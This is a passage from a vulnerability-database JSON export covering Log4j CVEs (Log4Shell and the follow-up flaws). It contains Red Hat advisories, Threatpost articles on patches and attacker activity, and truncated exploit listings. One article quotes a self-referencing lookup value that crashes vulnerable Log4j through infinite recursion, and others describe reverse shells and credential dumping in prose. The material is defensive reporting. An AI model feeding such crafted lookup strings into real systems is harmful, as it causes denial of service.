"CVE-2021-45046"], "modified": "2022-01-10T12:19:27", "id": "RHSA-2021:5094", "href": "https://access.redhat.com/errata/RHSA-2021:5094", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-15T16:42:53", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an\nattacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s)\nlisted in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T14:18:30", "type": "redhat", "title": "(RHSA-2021:5108) Critical: OpenShift Container Platform 4.8.z security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-15T12:31:06", "id": "RHSA-2021:5108", "href": "https://access.redhat.com/errata/RHSA-2021:5108", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T20:40:39", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T06:06:42", "type": "redhat", "title": "(RHSA-2021:5106) Critical: OpenShift Container Platform 4.6.z security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T06:07:03", "id": "RHSA-2021:5106", "href": "https://access.redhat.com/errata/RHSA-2021:5106", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-12-15T16:41:35", "description": "As if finding one easily exploited and extremely dangerous flaw in the ubiquitous Java logging library Apache Log4j hadn\u2019t already turned the Internet security community on its ear, researchers now have found a new vulnerability in Apache\u2019s patch issued to mitigate it.\n\nLast Thursday security researchers began warning that a vulnerability tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) in Apache Log4j was [under active attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) and had the potential, according to many reports, to break the internet. Dubbed Log4Shell by [LunaSec](<https://www.lunasec.io/docs/blog/log4j-zero-day/>), the flaw resides in the broadly deployed Java logging library and is a remote code execution (RCE) bug that\u2019s simple to exploit in many services and products.\n\nA barrage of attackers immediately set upon Log4Shell, initially to unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messages, including from text typed into chat messages. Then attackers began to branch out, [spawning](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) 60 or more bigger mutations of the original exploit in one day.\n\nTo its credit, Apache hastily released a patch to fix Log4Shell with Log4j [version 2.15.0](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0>) last Friday. But now researchers have found that this fix \u201cis incomplete in certain non-default configurations\u201d and paves the way for denial of service (DoS) attacks in certain scenarios, according to [a security advisory](<https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f>) by Apache.org.\n\nThe newly discovered flaw, tracked as [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), could allow attackers with control over Thread Context Map (MDC) input data to craft malicious input data using a Java Naming and Directory Interface (JNDI) Lookup pattern in certain instances, resulting in a DoS attack, according to the advisory.\n\nThe set-up for exploit is when the logging configuration uses a non-default Pattern Layout with either a Context Lookup \u2013 for example, $${ctx:loginId} \u2013 or a Thread Context Map pattern (%X, %mdc, or %MDC), according to the advisory.\n\n\u201cLog4j 2.15.0 restricts JNDI LDAP lookups to localhost by default,\u201d according to Apache.org. \u201cNote that previous mitigations involving configuration such as to set the system property `log4j2.noFormatMsgLookup` to `true` do NOT mitigate this specific vulnerability.\u201d\n\n## **Fixing the Fix**\n\nA new release of Log4j, version 2.16.0, fixes the issue by removing support for message lookup patterns and disabling JNDI functionality by default, according to the advisory. To mitigate the bug in previous Log4j releases, developers can remove the JndiLookup class from the classpath, Apache.org advised.\n\nOne security professional noted that it may have been Apache\u2019s haste to release a patch for Log4Shell after the initial panic over its discovery may have inadvertently caused the latest CVE.\n\n\u201cOften rushing patches to fix vulnerabilities means that the fix may not be complete, as the case is here,\u201d observed John Bambenek, principal threat hunter at Netenrich, in an email to Threatpost on Tuesday. He said the solution to the problem is \u201cto disable JNDI functionality entirely.\u201d\n\nSince at least a dozen groups are already known to be exploiting these vulnerabilities, he urged immediate action be taken to either patch, remove JNDI from Log4j or take it out of the classpath \u2013 \u201cpreferably all of the above,\u201d Bambenek said.\n\n## **Getting a Handle on the Situation**\n\nResearchers and security professionals are still wrapping their heads around the broad and wide-reaching implications of Log4Shell as well as the potential that remains for even more related bugs to be found, another security professional noted.\n\n\u201cWhen a vulnerability is discovered and makes as much noise as Log4Shell, it invariably signals that there are additional vulnerabilities in the same software or fixes for that software and triggers additional research and discovery,\u201d Casey Ellis, founder and CTO at [Bugcrowd](<https://bugcrowd.com/>), wrote in an email to Threatpost.\n\nIndeed, there already is some confusion about how many vulnerabilities currently exist that are related to Log4Shell and how they all correlate to one another, adding to the avalanche of information being published about the bug, researchers from RiskBased Security wrote in a [blog post](<https://www.riskbasedsecurity.com/2021/12/14/log4shell-log4j-vulnerability-attack-surface-variant-and-remediation/>) published Tuesday.\n\nAt this point, there are currently three published CVEs associated with Log4Shell \u2013 CVE-2021-44228, the original zero-day; CVE-2021-45046, the \u201cincomplete fix\u201d; and [CVE-2021-4104](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>), a flaw found in another component of Log4j, JMSAppender, that doesn\u2019t appear to be of great concern, according to the RiskBased Security team.\n\nIn the case of CVE-2021-44228, researchers argue that it is not a new problem at all, \u201cbut is really the same vulnerability,\u201d according to the post.\n\n\u201cMITRE and CVE Numbering Authorities (CNA) will assign a second CVE ID in cases of fixes not fully patching an issue,\u201d researchers wrote. \u201cThis helps some organizations in tracking an issue while introducing confusion to others.\u201d\n\nAnd despite there being more than one CVE, \u201cplaces have been treating them as a single issue, but this is definitely not the case,\u201d according to RiskBased Security.\n\n## **Worse Before It Gets Better**\n\nOne thing that\u2019s certain about the mounting drama surrounding Log4Shell is that, because the attack surface for the vulnerability is so vast, there is great potential for extensive and further exploitation, according to RiskBased Security.\n\n\u201cIt is important to call out that Log4j is a popular logging framework in Java,\u201d researchers wrote in the post. \u201cThis means it\u2019s used in an _extraordinary _number of things.\u201d\n\nIndeed, a long list of vendors\u2019 products are vulnerable to Log4Shell, including but not limited to: Broadcom, Cisco, Elasticsearch, F-secure, Fedora, HP, IBM, Microsoft, National Security Agency (NSA), RedHat, SonicWall and VMWare.\n\nWithin hours of public disclosure of the flaw, [attackers](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) were scanning for vulnerable servers and [unleashing attacks](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) to drop coin-miners, [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) malware, the [new Khonsari ransomware](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>), the Orcus remote access trojan (RAT). reverse bash shells for future attacks, [Mirai and other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), and backdoors.\n\nWhatever happens going forward, as variations for the original exploit continue to be spawned and attackers continue to swarm, the situation is likely to get worse before it gets better. This means that the dust over Log4Shell probably won\u2019t settle for a very long time.\n\n\u201cThis new Log4j vulnerability will likely haunt us for years to come,\u201d according to RiskBased Security.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T14:04:19", "type": "threatpost", "title": "Apache\u2019s Fix for Log4Shell Can Lead to DoS Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-15T14:04:19", "id": "THREATPOST:46837E7270195429E1D891848E911254", "href": "https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T00:54:20", "description": "Cyber criminals, under the moniker Aquatic Panda, are the latest advanced persistent threat group (APT) to exploit the [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) vulnerability.\n\nResearchers from CrowdStrike Falcon OverWatch recently disrupted the threat actors using Log4Shell exploit tools on a vulnerable VMware installation during an attack that involved of a large undisclosed academic institution, according to research released Wednesday.\n\nOverWatch quickly notified the organization of the activity so the target could \u201cbegin their incident response protocol,\u201d researchers said.\n\nCrowdStrike, among other security firms, has been monitoring for suspicious activity around a vulnerability tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) and colloquially known as Log4Shell that was found in the Apache Log4j logging library in early December and immediately [set upon](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) by attackers.\n\n## **Ever-Widening Attack Surface**\n\nDue to its ubiquitous use, many common infrastructure products from Microsoft, Apple, Twitter, CloudFlare and others are vulnerable to Log4Shell attacks. Recently, VMware also [issued guidance](<https://kb.vmware.com/s/article/87073>) that some components of its Horizon service are vulnerable to Log4j exploits, leading OverWatch to add the VMware Horizon Tomcat web server service to their processes-to-watch list, researchers said.\n\nThe Falcon OverWatch team noticed the Aquatic Panda intrusion when the threat actor performed multiple connectivity checks via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org, executed under the Apache Tomcat service running on the VMware Horizon instance, they wrote in the post.\n\n\u201cThe threat actor then executed a series of Linux commands, including attempting to execute a bash-based interactive shell with a hardcoded IP address as well as curl and wget commands in order to retrieve threat-actor tooling hosted on remote infrastructure,\u201d researchers wrote.\n\nThe commands were executed on a Windows host under the Apache Tomcat service, researchers said. They triaged the initial activity and immediately sent a critical detection to the victim organization, later sharing additional details directly with their security team, they said.\n\nEventually, researchers assessed that a modified version of the Log4j exploit was likely used during the course of the threat actor\u2019s operations, and that the infrastructure used in the attack is linked to Aquatic Panda, they said.\n\n## **Tracking the Attack**\n\nOverWatch researchers tracked the threat actor\u2019s activity closely during the intrusion to provide continuous updates to academic institution as its security administrators scrambled to mitigate the attack, they said.\n\nAquatic Panda engaged in reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details. Researchers also observed the group attempt discover and stop a third-party endpoint detection and response (EDR) service, they said.\n\nThe threat actors downloaded additional scripts and then executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit. They also retrieved three files with VBS file extensions from remote infrastructure, which they then decoded.\n\n\u201cBased on the telemetry available, OverWatch believes these files likely constituted a reverse shell, which was loaded into memory via DLL search-order hijacking,\u201d researchers wrote.\n\nAquatic Panda eventually made multiple attempts to harvest credentials by dumping the memory of the LSASS process using living-off-the-land binaries rdrleakdiag.exe and cdump.exe, a renamed copy of createdump.exe.\n\n\u201cThe threat actor used winRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\\temp\\ directories,\u201d researchers wrote.\n\nThe victim organization eventually patched the vulnerable application, which prevented further action from Aquatic Panda on the host and stopped the attack, researchers said.\n\n## **New Year, Same Exploit**\n\nAs 2021 comes to a close, it\u2019s likely Log4Shell and exploits developed so attackers can use it for nefarious activity will carry their disruption into the new year.\n\n\u201cThe discussion globally around Log4j has been intense, putting many organizations on edge,\u201d OverWatch researchers wrote. \u201cNo organization wants to hear about such a potentially destructive vulnerability affecting its networks.\u201d\n\nIndeed, the flaw already has created considerable headache for organizations and security researchers alike since its discovery earlier this month. Attackers immediately jumped on Log4Shell, [spawning 60 variants](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) of the original exploit created for the flaw in a 24-hour period when it was first revealed. Though Apache moved quickly to patch it, the fix [also turned problematic](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>), creating a [vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) of its own.\n\nMoreover, Aquatic Panda also is not the first organized cybercrime group to recognize the opportunity to exploit Log4Shell, and likely not be the last. On Dec. 20, the Russia-based Conti ransomware gang\u2014known for its sophistication and ruthlessness\u2013became the first professional crimeware outfit [to adopt and weaponize](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) the Log4Shell vulnerability with the creation of a holistic attack chain.\n\nCrowdStrike urged organizations to remain abreast of the latest mitigations available for Log4Shell and overall Log4j vulnerabilities as the situation evolves.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-30T16:16:23", "type": "threatpost", "title": "APT \u2018Aquatic Panda\u2019 Targets Universities with Log4Shell Exploit Tools", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-30T16:16:23", "id": "THREATPOST:EE0A71A925297032000651C344890BDD", "href": "https://threatpost.com/aquatic-panda-log4shell-exploit-tools/177312/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-20T16:11:34", "description": "No, you\u2019re not seeing triple: On Friday, Apache released yet another patch \u2013 [version 2.17](<https://logging.apache.org/log4j/2.x/download.html>) \u2013 for yet another flaw in the ubiquitous log4j logging library, this time for a DoS bug.\n\nTrouble comes in threes, and this is the third one for log4j. The latest bug isn\u2019t a variant of the Log4Shell remote-code execution (RCE) bug that\u2019s plagued IT teams since Dec. 10, coming [under active attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) [worldwide](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) within hours of its public disclosure, spawning [even nastier mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) and leading to the [potential for denial-of-service](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) (DoS) in Apache\u2019s initial patch.\n\nIt does have similarities, though: The new bug affects the same component as the Log4Shell bug. Both the Log4Shell, tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (criticality rating of CVSS 10.0) and the new bug, tracked as [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/CVE-2021-45105>) (CVSS score: 7.5) abuse attacker-controlled lookups in logged data.\n\nThe difference: The lookups in the new bug, CVE-2021-45105, are Context Map lookups instead of the Java Naming and Directory Interface (JNDI) lookups to an LDAP server that allow attackers to execute any code that\u2019s returned in the Log4Shell vulnerability.\n\nContextMapLookup allows applications to store data in the Log4j ThreadContext Map and then retrieve the values in the Log4j configuration: For example, an app would store the current user\u2019s login id in the ThreadContext Map with the key \u201cloginId\u201d.\n\nThe weakness has to do with improper input validation and uncontrolled recursion that can lead to DoS.\n\nAs [explained](<https://www.zerodayinitiative.com/blog/2021/12/17/cve-2021-45105-denial-of-service-via-uncontrolled-recursion-in-log4j-strsubstitutor>) by Guy Lederfein of the Trend Micro Research Team, \u201cthe Apache Log4j API supports variable substitution in lookups. However, a crafted variable can cause the application to crash due to uncontrolled recursive substitutions. An attacker with control over lookup commands (e.g., via the Thread Context Map) can craft a malicious lookup variable, which results in a Denial-of-Service (DoS) attack.\u201d\n\nThe new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16, which Apache shipped last week to remediate the [second flaw](<https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/>) in the trio. That second bug was the RCE flaw [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), which, in turn, stemmed from Apache\u2019s [incomplete fix](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) for [CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>), aka the Log4Shell vulnerability.\n\nLederfein continued: \u201cWhen a nested variable is substituted by the StrSubstitutor class, it recursively calls the substitute() class. However, when the nested variable references the variable being replaced, the recursion is called with the same string. This leads to an infinite recursion and a DoS condition on the server. As an example, if the Pattern Layout contains a Context Lookup of ${ctx.apiversion}, and its assigned value is ${${ctx.apiversion}}, the variable will be recursively substituted with itself.\u201d\n\nThe vulnerability has been tested and confirmed on Log4j versions up to and including 2.16, he said.\n\nApache has listed mitigating factors, but ZDI recommends upgrading to the latest version to ensure that the bug is completely addressed.\n\nThe latest bug and Apache\u2019s new round of fixes are just the latest news in the ongoing, ever-shifting log4j situation. As exploits flood in, new vulnerabilities emerge and patches turn out to need patching, huge tech players [such as SAP](<https://threatpost.com/sap-log4shell-vulnerability-apps/177069/>) have been hurrying to hunt down the logging library and to release product patches.\n\n## CISA Mandates Immediate Patching\n\nOn Thursday, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an [emergency directive](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>) mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 23.\n\nThe risk presented by the library\u2019s vulnerabilities is sky-high, as multiple threat actors have jumped on the opportunities to exploit vulnerable systems. As Check Point Research (CPR) [highlighted](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) last week, real-life attacks have included a crypto-mining group that launched attacks in five countries.\n\nLast week, Microsoft reported that nation-state groups Phosphorus (Iran) and [Hafnium](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) (China), as well as unnamed APTs from North Korea and Turkey, are actively exploiting Log4Shell in targeted attacks. Hafnium is known for targeting Exchange servers with the ProxyLogon zero-days back in March, while Phosphorus \u2013 aka [Charming Kitten](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>), APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 [made headlines](<https://threatpost.com/microsoft-iranian-apt-t20-summit-munich-security-conference/160654/>) for targeting global summits and conferences in 2020.\n\nCPR said that Charming Kitten had gone after seven Israeli targets as of Wednesday.\n\n## Conti Ransomware Gang Is Among the Attackers\n\nThe Conti ransomware gang is in on it too: AdvIntel researchers said last week that they\u2019re seen Conti operators going after VMware vCenter.\n\n\u201cThe current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4j 2 exploit,\u201d the researchers [said](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) last week. \u201cThe criminals pursued targeting specific vulnerable [Log4j 2 VMware vCenter](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) [servers] for lateral movement directly from the compromised network resulting in vCenter access affecting U.S. and European victim networks from the pre-existent Cobalt Strike sessions.\u201d\n\nLast week, a ransomware attack that some suspect may be attributable to the [Conti gang](<https://threatpost.com/conti-ransomware-backups/175114/>) forced a family-run chain of restaurants, hotels and breweries, [McMenamins](<https://www.mcmenamins.com/>), to [shut down some operations.](<https://threatpost.com/conti-gang-ransomware-attack-mcmenamins/177119/>)\n\nThe bugs are also being leveraged by botnets, remote access trojans (RATs), initial access brokers, and a new ransomware strain called Khonsari. As of Monday, CPR said that it\u2019s seen more than 4.3 million attempted exploits, more than 46 percent of which were made by \u201cknown malicious groups.\u201d\n\n## Yet More Sleepless Nights\n\nTrend Micro\u2019s Lederfein noted that the log4j component has had quite a run in the vulnerability spotlight, having received \u201cquite a bit of attention\u201d since the Log4Shell vulnerability was revealed 10 days ago. Expect more of the same, he predicted, as \u201cit would not be a surprise to see further bugs disclosed \u2013 with or without a patch.\u201d\n\nTom Garrubba, CISO with Shared Assessments, concurred: \u201cThis vulnerability has been keeping a lot of security professionals up at night,\u201d he told Threatpost. This Javageddon has even percolated up to the C-suite, he said, with the vulnerability \u201ckeeping a lot of security professionals up at night.\u201d\n\n\u201cExecutives and board members are also gaining interest as to how this will affect them as well,\u201d he said via email. \u201cLog4j is used all throughout the Internet and [affects] multiple applications and systems with deep roots.\u201d\n\n\u201cThe best path you can take right now it\u2019s a stay alert of all patches that are coming out to address this vulnerability and put them into place immediately,\u201d Garrubba advised. \u201cSadly, it appears this is going to affect organization\u2019s continuously into the future as they identify more items that are affected by this vulnerability.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T16:01:57", "type": "threatpost", "title": "Third Log4J Bug Can Trigger DoS; Apache Issues Patch", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-20T16:01:57", "id": "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "href": "https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-21T09:29:03", "description": "<!-- ABOUT THE PROJECT -->\n## About The Project\n\n\nThis is a spec...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T05:13:25", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-03-21T08:34:57", "id": "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-21T23:09:12", "description": "# CVE-2021-44228\nIl 9 dicembre 2021 il mondo \u00e8 venuto a conoscen...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T10:36:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228", "CVE-2021-4104", "CVE-2021-45105"], "modified": "2021-12-21T11:08:13", "id": "D298A3C8-E215-5549-B1A0-D01215070203", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T13:56:34", "description": "<div align=\"center\" >\ud83e\udd1d Show your support - give a \u2b50\ufe0f if you like...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 